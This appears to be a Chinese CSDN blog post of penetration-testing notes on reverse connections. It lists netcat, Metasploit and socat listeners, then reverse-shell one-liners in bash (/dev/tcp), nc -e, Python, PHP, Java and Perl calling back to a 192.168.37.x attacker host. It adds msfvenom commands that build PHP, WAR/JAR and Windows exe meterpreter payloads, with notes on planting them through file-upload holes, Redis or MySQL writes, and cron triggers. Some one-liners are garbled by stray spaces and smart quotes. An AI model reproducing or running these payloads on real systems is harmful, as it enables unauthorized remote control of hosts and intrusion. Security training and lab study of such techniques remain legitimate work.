反弹连接基础

已于 2022-03-14 17:07:58 修改
阅读量5k 收藏 2
点赞数
分类专栏: 渗透 文章标签: 安全
于 2022-03-11 12:57:18 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45455136/article/details/123416463
版权

反弹连接

反弹连接适应情况

  • 没有安装HTTP Server或找不到网站目录
  • 内网,私有IP
  • IP动态变化
  • 6379端口不允许入方向
  • 一句话木马被删除

常见端口监听方式

  • netcat:nc -lvp 7777
  • msf:
    msfconsole
    use exploit/multi/handler
    set payload php/meterpreter/reverse_tcp
    set lhost 192.168.37.130
    set lport 7777
    run
  • socat:socat TCP-LISTEN:7777 - (kali系统)

建立反弹连接方式

  • Linux bash:
    bash -i >& /dev/tcp/192.168.37.129/7777 0>&1
  • netcat:
    nc -e /bin/bash 192.168.37.129 7777
  • Python:
    python - c “import os,socket,subprocess;
    s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((‘192.168.37.129’,7777));os.dup2(s.fileno(),0);os.du p2(s.fileno(),1);
    os.dup2(s.fileno(),2);p=subprocess.call([’/bin/bash’,’- i’]);”
  • PHP:
    1)php -r ‘exec("/bin/bash -i >& /dev/tcp/192.168.37.129 7777");’
    2)php -r '$sock=fsockopen(“192.168.37.129”,7777);exec("/bin/bash -i <&3 >&3 2>&3");’
  • Java:
    r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c",“exec 5<>/dev/tcp/192.168.37.129/7777;cat <&5 | while read line; do $line 2>&5 >&5; done”] as String[]) p.waitFor()
  • perl:
    perl - e ‘use Socket;$i=“192.168.37.129”;$p=7777;socket(S,PF_INET,SOCK_STREAM,ge tprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(S TDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh - i");};’
  • msf-PHP:
    msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.37.130 lport=7777 -o shell.php
  • msf-Java:
    1)msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.37.130 lport=7777 -f war -o shell.war
    2)msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.37.130 lport=7777 -f jar -o shell.jar
  • msf-exe:
    msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.37.130 lport=7777 -i 5 -f exe -o test.exe

msf反弹连接配合msf监听模块使用

反弹连接流程

监听端口->执行命令,或上传payload访问,建立连接

如何上传文件:

  • 文件上传漏洞
  • 写入文件:MSQL、Redis、CMS
  • 文件编辑命令:tee、.py

如何执行:访问或定时任务自动触发

c1o22
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
反弹连接后门反弹连接后门
06-25
反弹连接后门反弹连接后门反弹连接后门反弹连接后门
JAVA实验报告
05-18
JAVA 实验报告,分别是 Java语言基础、实现线性表、学生管理系统、Java连接数据库、反弹小球。含JAVA具体代码,实验步骤,实验心得体会。
反弹连接技术
weixin_30341745的博客
11-28 1121
应用 现在的远程控制软件很流行使用反弹连接技术。反弹技术的诞生,是为了解决传统的远程控制软件不能访问装有防火墙以及不能控制局域网内部的远程计算机。 域名反弹连接的原理很简单 编辑本段 服务端程序运行后,主动连接一个网络域名或IP地址,而本地用户通过客户端程序及时将电脑当前的IP地址及打开的端口更新到网络域名,这样服务端程序就可以成功连接到客户端,从而完成连接。因此通过反弹连接技术就可以在互联网上...
nc 反弹链接
diankui6178的博客
09-06 205
nc -l -v -p 80在本机监听80端口,此时80端口是打开的,我们可以在浏览器输入127.0.0.1进行浏览,此时就会出现连接,我们再在监听窗口输入字符,就会在浏览器上显示了。知道上面的作用后,我们就可以在此的基础上,再在webshell里面执行 nc -e cmd.exe 192.168.246.1 80此条命令会把cmd反弹到192.168.246.1上,我们就可以想在本...
反弹连接vlunhub靶机prinme1
m0_57379855的博客
09-25 467
2021-9-3 通过ip获取root权限漏洞靶机下载扫描局域网内的C段主机扫描端口获得运行的服务扫描目录获得关键信息fuzz获得正确的参数wordpress漏洞利用msfvenom生成反弹shellmsfconsole监听利用Ubuntu内核提权渗透测试的流程与技术 漏洞靶机下载 提供靶机的镜像平台链接 https://www.vulnhub.com/ 该平台有非常多的漏洞靶机镜像 今天测试的靶机链接为 https://www.vulnhub.com/entry/prime-1,358/ 点击下载,直接
PHP后门反弹连接DVWA
m0_57379855的博客
03-31 3266
PHP后门反弹连接DVWA环境准备操作系统准备DVWA靶场准备metasploit配置监控及攻击载荷配置监控配置攻击载荷生成php后门上传后门文件后渗透获取数据库信息 环境准备 操作系统准备 kali : 192.168.202.133 win10:192.168.202.139 DVWA靶场准备 DVWA下载 注意:配置DVWA环境 准备PHP7.0以上,和 Nginx环境 设置网站 配置数据库密码 与数据库设置保持一致 metasploit配置监控及攻击载荷 配置监控 使用handle
HUST嵌入式系统实验大作业,基于蓝牙互联的双人弹球游戏+源代码+文档说明+pdf
12-17
# 基于蓝牙互联的双人弹球游戏 ...3、如果基础还行,也可在此代码基础上进行修改,以实现其他功能,也可用于毕设、课设、作业等。 下载后请首先打开README.md文件(如有),仅供学习参考, 切勿用于商业用途。
《安天365安全研究》第二期.pdf
08-07
2.6MSSQL sa 弱口令提权基础知识学习 2.6.1“扩展存储过程”中的 xp_cmdshell 2.6.2 利用 xp_cmdshell 存储过程添加账号 2.6.3OLE 相关存储过程添加账户 2.6.3xp_regread & xp_regwrite 克隆账号 2.6.4MSSQL 存储...
电子信息设备防雷设计探析.docx
02-27
其中牵涉到的系统环节数量较多,信号的接口也多,在一定范围内为雷电破坏奠定了基础,提供了有利条件,电压波极其简单就可以通过这些渠道进入到电子系统,引发后患。 2 预防雷电直接击打的对策 首先需要明确之所以要...
物联网产业发展与人才需求调研报告.docx
12-24
目前我国物联网已初步形成了完整的产业体系,具备了一定的技术、产业和应用基础,在中央系列顶层设计和各地各部门的不懈努力下,我国物联网发展取得了显著成效。我国物联网产业规模从2009年的1700亿元跃升至2015年...
反弹连接vulnhub靶场breach1
m0_57379855的博客
03-10 677
vulnhub靶场breach1靶场环境配置靶机网络工具准备端口扫描信息收集指纹识别CMS后台信息收集解密HTTPS流量Tomcat后台利用Linux提权 靶场环境 https://www.vulnhub.com/ 配置靶机网络 工具准备 准备一个kali burpsuite wireshark CTF编码工具 kali反弹 192.168.110.128 breach1 192.168.110.140 kali攻击 192.168.202.129 端口扫描信息收集 nmap -T4 -A -v 19
VNC 反弹连接模式设置 for linux
Information Security Technology Organization
09-23 1795
文章作者: solariz7@yahoo.com版权所有,转载需注明作者,未经作者同意,不得用于任何形式的商业活动信息来源: I.S.T.O信息安全团队(http://blog.csdn.net/I_S_T_O)客户端到服务器正常连接方式请参考其它资料 服务器到客户端反弹连接为 在VNC客户端 vnc-viewer设为listerning mode ,然后netstat -an 查看确保缺省5
反弹shell的正向连接和反向连接
qq_44833342的博客
05-29 363
攻击者通过该连接获得对目标计算机的控制权。在正向连接中,攻击者需要知道目标计算机的IP地址和端口号,通过这些信息建立连接。而在反向连接中,目标计算机会向攻击者的计算机发起连接请求,攻击者只需要监听该请求即可建立连接。因此,反弹shell的反向连接更难被防御和检测,也更容易在网络中隐藏攻击者的身份。反弹shell是一种攻击技术,可以在未经授权的情况下远程控制目标计算机。正向连接是攻击者与目标计算机之间建立的连接,反向连接是目标计算机与攻击者之间建立的连接,攻击者通过该连接发送命令来控制目标计算机。
反弹连接的shellcode
12-26 562
C代码 #include<sys/socket.h> //构造socket所需的库 #include<netinet/in.h> //定义sockaddr结构 int main() { char *shell[2]; //用于execv调用 int soc,remote; //文件描述符句柄 struct so...
TCP连接反弹技术
最新发布
weixin_43049833的博客
02-08 490
总的来说,反弹shell的基础操作包括在攻击者的机器上设置一个监听端口,然后在受害者机器上使用特定的命令将标准输入输出重定向到该端口,从而实现远程控制。在反弹技术中,Netcat可以用来在攻击者的机器上监听特定端口,等待从受害者机器上发出的连接请求,一旦连接建立,就可以进行命令执行和数据传输。其次,反弹技术,也被称为反向连接反弹shell,是攻击者在被害主机上执行的命令能够通过网络送回到攻击者机器上的一种技术。在TCP/IP协议中,TCP提供数据传输过程中的连接建立、数据包排序和错误恢复等机制。
Redis未授权访问漏洞之反弹连接,SSH Key免密登陆,Webshell提权
qq_60115503的博客
05-10 791
Redis简介 REmote DIctionary Server(Redis)是一个由Salvatore Sanfilippo写的key-value存储系统,是跨平台的非关系型数据库(端口:6379) 存储缓存用的数据 需要高速读/写的场合使用它快速读/写 外网Redis配置 找到redis中的redis.cof文件并打开: 修改protectd-mode为no 将#bind 127.0.0.1修改为bind 127.0.0.1 修改daemonize属...
Mysql数据库反弹端口连接提权_MYSQL提权总结
weixin_39692045的博客
01-20 293
最近在测试一个项目,遇到了MYSQL数据库,想尽办法提权,最终都没有成功,很是郁闷,可能是自己很久没有研究过提权导致的吧,总结一下MYSQL提权的各种姿势吧,权当复习了。关于mysql提权的方法也就那么几种,希望也能帮到各位小伙伴们。一、利用mof提权前段时间国外Kingcope大牛发布了mysql远程提权0day(MySQL Windows Remote System Level Exploit...
php反弹,PHP Webshell 下的端口反弹方法
weixin_29421409的博客
03-10 316
使用方法:需要将以下代码保存为一个单独的php文件。上传到服务器之后,本地NC监听一个端口,在代码里设置好反弹IP和端口,然后直接访问上传的php文件,就会给 NC 弹回来一个shell。测试实例:先在本地执行 nc -vv -l -p port,然后访问这个php页面 http://www.site.com/phpdkft.php ,本地就会得到一个反弹的shell。这样每次可以直接访问这个ph...
[笔记]Windows安全之《一》反弹Shell
二次元怪兽的博客
04-01 1773
powershell反弹shell常见方式 文章目录正向连接和反向连接反弹连接)PowerShell的配置常见的反弹Shell总结 正向连接和反向连接反弹连接) PowerShell的配置 常见的反弹Shell 总结
反弹shell无法反弹
08-13
1. 防火墙或安全策略:目标主机可能配置了防火墙或其他安全策略,阻止了反弹shell连接。您可以尝试绕过这些安全策略,例如修改反弹shell的目标端口或使用其他技术来绕过防火墙。 2. 端口未开放:如果目标主机的特定...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值